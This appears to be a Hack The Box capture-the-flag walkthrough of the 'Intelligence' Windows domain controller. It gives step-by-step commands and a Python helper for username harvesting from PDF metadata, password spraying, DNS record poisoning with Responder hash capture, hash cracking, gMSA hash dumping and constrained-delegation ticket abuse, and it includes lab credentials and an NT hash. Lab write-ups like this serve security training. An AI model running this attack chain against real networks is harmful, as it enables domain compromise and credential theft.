In this post, I would like to share a walkthrough of the Intelligence machine on Hack The Box.
This machine is rated Medium difficulty.
Information Gathering on Intelligence Machine
Once the VPN connection is up, we can start the information gathering on the machine by running nmap -sC -sV -Pn -oA initial <IP Address>. -Pn skips host discovery (the host filters ICMP probes), -sC runs the default scripts and -sV probes service versions; the scan below covers the default top 1000 ports.
# Nmap 7.91 scan initiated Sun Jul 4 09:05:50 2021 as: nmap -sC -sV -oA intial -Pn 10.10.10.248
Nmap scan report for 10.10.10.248
Host is up (0.21s latency).
Not shown: 988 filtered ports
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Intelligence
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-07-04 20:19:01Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after: 2022-04-19T00:43:16
|_ssl-date: 2021-07-04T20:20:28+00:00; +7h12m33s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after: 2022-04-19T00:43:16
|_ssl-date: 2021-07-04T20:20:25+00:00; +7h12m32s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after: 2022-04-19T00:43:16
|_ssl-date: 2021-07-04T20:20:28+00:00; +7h12m33s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after: 2022-04-19T00:43:16
|_ssl-date: 2021-07-04T20:20:25+00:00; +7h12m32s from scanner time.
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 7h12m32s, deviation: 0s, median: 7h12m31s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2021-07-04T20:19:46
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jul 4 09:07:55 2021 -- 1 IP address (1 host up) scanned in 125.33 seconds
From the result, we can see that the machine is a Windows Domain Controller for intelligence.htb (DNS, Kerberos, LDAP and SMB are all exposed) and that its clock is about 7 hours ahead of ours, which matters later for Kerberos.
** I'm so overly excited with this machine because I got to play with Active Directory **
We need to map the domain names to the machine IP in /etc/hosts, such as intelligence.htb and dc.intelligence.htb.
Let's open the browser and go straight to the website.
The website is a static "Intelligence" page that doesn't contain any login page or link to access anything with.
However, after scrolling down the page we notice two download links.
Oh wow! One of the PDF files contains a default password, though it doesn't say which account it belongs to.
There's a way to obtain more of the PDF files and download them to our machine. (Oh wait! I just noticed that there are more than 40 PDF files stored on the machine.)
***You can use tools to enumerate the PDF files, but I'm doing it manually***
We need to check who created or uploaded each PDF: the creator field in the PDF metadata holds the username of the account that produced it. That gives us a long list of usernames (together with the built-in Administrator, Guest and krbtgt accounts), shown below:
Administrator
Guest
krbtgt
Danny.Matthews
Jose.Williams
Jason.Wright
Samuel.Richardson
David.Mcbride
Scott.Scott
David.Reed
Ian.Duncan
Michelle.Kent
Jennifer.Thomas
Kaitlyn.Zimmerman
Travis.Evans
Kelly.Long
Nicole.Brock
Stephanie.Young
John.Coleman
Thomas.Valenzuela
Thomas.Hall
Brian.Baker
Richard.Williams
Teresa.Williamson
David.Wilson
Darryl.Harris
William.Lee
Thomas.Wise
Veronica.Patel
Joel.Crawford
Jean.Walter
Anita.Roberts
Brian.Morris
Daniel.Shelton
Jessica.Moody
Tiffany.Molina
James.Curbow
Jeremy.Mora
Jason.Patterson
Laura.Lee
Ted.Graves
We should save those names into a single file, which I save as user.txt in my case.
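As an added example (not tooling from the original walkthrough), here is a small Python script that does the manual step above: pull the /Creator and /Author fields out of each PDF's Info dictionary and build the user list. The PDFs embedded in it are constructed byte strings, not files from the machine; fetch() and the user.txt output name are assumptions.

```python
"""Pull creator/author usernames out of PDF metadata and build a user list.

Added example for this walkthrough, not the author's own tooling.  The PDFs
below are constructed byte strings (not files from the machine); fetch() and
the output filename are assumptions.  Only uncompressed Info dictionaries are
handled; if the Info dict sits inside a compressed object stream (PDF 1.5+),
use exiftool or pdfinfo instead.
"""
import re
import urllib.request

# /Creator (literal string) and /Creator <hex string> forms of the Info entry.
_LITERAL = re.compile(rb"/(?:Creator|Author)\s*\((?P<s>(?:\\.|[^\\)])*)\)")
_HEX = re.compile(rb"/(?:Creator|Author)\s*<(?P<h>[0-9A-Fa-f\s]*)>")


def _decode(raw: bytes) -> str:
    # PDF text strings are PDFDocEncoding (treated as latin-1 here) or
    # UTF-16BE with a byte-order mark.
    if raw.startswith(b"\xfe\xff"):
        return raw[2:].decode("utf-16-be", "replace")
    return raw.decode("latin-1")


def _unescape(s: bytes) -> bytes:
    # Resolve PDF literal-string escapes: \( \) \\ \n \r \t and \ddd octal.
    out = bytearray()
    i = 0
    while i < len(s):
        c = s[i]
        if c == 0x5C and i + 1 < len(s):
            n = s[i + 1]
            if 0x30 <= n <= 0x37:  # octal escape, up to three digits
                j, val = i + 1, 0
                while j < len(s) and j < i + 4 and 0x30 <= s[j] <= 0x37:
                    val = val * 8 + (s[j] - 0x30)
                    j += 1
                out.append(val & 0xFF)
                i = j
                continue
            out.append({0x6E: 10, 0x72: 13, 0x74: 9}.get(n, n))
            i += 2
            continue
        out.append(c)
        i += 1
    return bytes(out)


def extract_creators(pdf: bytes) -> set:
    """Return every /Creator or /Author value found in the raw PDF bytes."""
    names = set()
    for m in _LITERAL.finditer(pdf):
        names.add(_decode(_unescape(m.group("s"))))
    for m in _HEX.finditer(pdf):
        hexdigits = re.sub(rb"\s", b"", m.group("h"))
        if len(hexdigits) % 2:  # PDF pads an odd trailing digit with 0
            hexdigits += b"0"
        names.add(_decode(bytes.fromhex(hexdigits.decode("ascii"))))
    return {n.strip() for n in names if n.strip()}


def collect_usernames(pdfs) -> list:
    """Union of the metadata names of all PDFs, sorted case-insensitively."""
    seen = set()
    for blob in pdfs:
        seen |= extract_creators(blob)
    return sorted(seen, key=str.lower)


def fetch(url: str, timeout: int = 10) -> bytes:
    # Assumed helper: download one PDF; call it for each link found on the site.
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resp.read()


# Constructed sample PDFs: a literal-string /Creator, a UTF-16BE hex /Author,
# and a duplicate to show de-duplication.
SAMPLE_PDFS = [
    b"%PDF-1.4\n1 0 obj\n<< /Creator (Jason.Wright) /Producer (Microsoft Word) >>\nendobj\n",
    b"%PDF-1.4\n1 0 obj\n<< /Author <FEFF 0054 0065 0064 002E 0047 0072 0061 0076 0065 0073> >>\nendobj\n",
    b"%PDF-1.4\n1 0 obj\n<< /Creator (Jason.Wright) >>\nendobj\n",
]

if __name__ == "__main__":
    names = collect_usernames(SAMPLE_PDFS)
    with open("user.txt", "w") as fh:  # assumed output name
        fh.write("\n".join(names) + "\n")
    print("\n".join(names))
```

Run it against real downloads by replacing SAMPLE_PDFS with [fetch(u) for u in urls]; the resulting user.txt is the input for the password spray in the next section.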
Enumerate the machine with crackmapexec
We can easily determine which user the password belongs to by spraying it across the whole list with crackmapexec smb <ip> -u <user file> -p <password we found earlier>. One password tried against many users is safe with respect to account lockout; the reverse (many passwords against one user) is not.
** You can download crackmapexec over here
After a while, I managed to determine that Tiffany.Molina is the user whose password it is.
Let's access the SMB "Users" share with Tiffany.Molina's credentials by running smbclient \\\\intelligence.htb\\Users -U Tiffany.Molina
We find the user flag in the \Tiffany.Molina\Desktop\ directory.
However, smbclient has no type command, so there are a couple of ways to read the user flag from here:
- more user.txt (views the file from inside smbclient)
- get user.txt (downloads the file to our machine)
We can read the user flag and paste it into the HTB Submit Flag field.
Escalate to Administrator Privileges
The next step is to add a DNS record in the intelligence.htb zone that points a hostname at our attacking machine, using dnstool.py from krbrelayx. Any valid domain credentials, such as Tiffany.Molina's, are enough, because by default authenticated users may create records in an AD-integrated DNS zone. The point is that an internal process on the DC resolves that hostname, connects to our machine and authenticates with its own account, which is what we capture.
For those who don't have the tool, you can download dnstool over here
To capture that authentication, run Responder on the VPN interface before the connection arrives: sudo responder -I tun0 -A. It logs an NTLMv2-SSP hash for Ted.Graves.
Copy the NTLMv2 hash from Responder's output into a new file (any name is fine) and crack it offline, for example with hashcat -m 5600 <file> <wordlist> or john --format=netntlmv2 <file>, to recover Ted.Graves's password.
With Ted.Graves's password we can read the managed password of the gMSA account svc_int$ (Ted.Graves is allowed to retrieve it) by running python3 gMSADumper.py -u 'Ted.Graves' -p 'Mr.Teddy' -d 'intelligence.htb' -l 'dc.intelligence.htb', which prints the account's NTLM hash.
Kerberos rejects requests when the clock skew is more than five minutes, and the nmap scan showed our clock about 7 hours behind the DC, so sync it first with sudo ntpdate <machine IP>.
svc_int$ is trusted for constrained delegation to WWW/dc.intelligence.htb, so with its hash we can request a service ticket for that SPN on behalf of Administrator (S4U2self followed by S4U2proxy): impacket-getST intelligence.htb/svc_int$ -spn WWW/dc.intelligence.htb -hashes :d64b83fe606e6d3005e20ce0ee932fe2 -impersonate Administrator. Note the colon before the NT hash, since -hashes takes LMHASH:NTHASH. The ticket is written to Administrator.ccache.
Then export the ticket so the Impacket tools pick it up: export KRB5CCNAME=Administrator.ccache
We can read the root flag with impacket-atexec -k -no-pass dc.intelligence.htb 'type C:\Users\Administrator\Desktop\root.txt' (-k -no-pass tells it to authenticate with the Kerberos ticket in KRB5CCNAME instead of a password).
In the screenshot above, I forgot to insert the closing ' at the end of the command, which is why I could not read the root flag.
I re-ran the command as above and it worked!
-THE END-
Happy Learning Guys!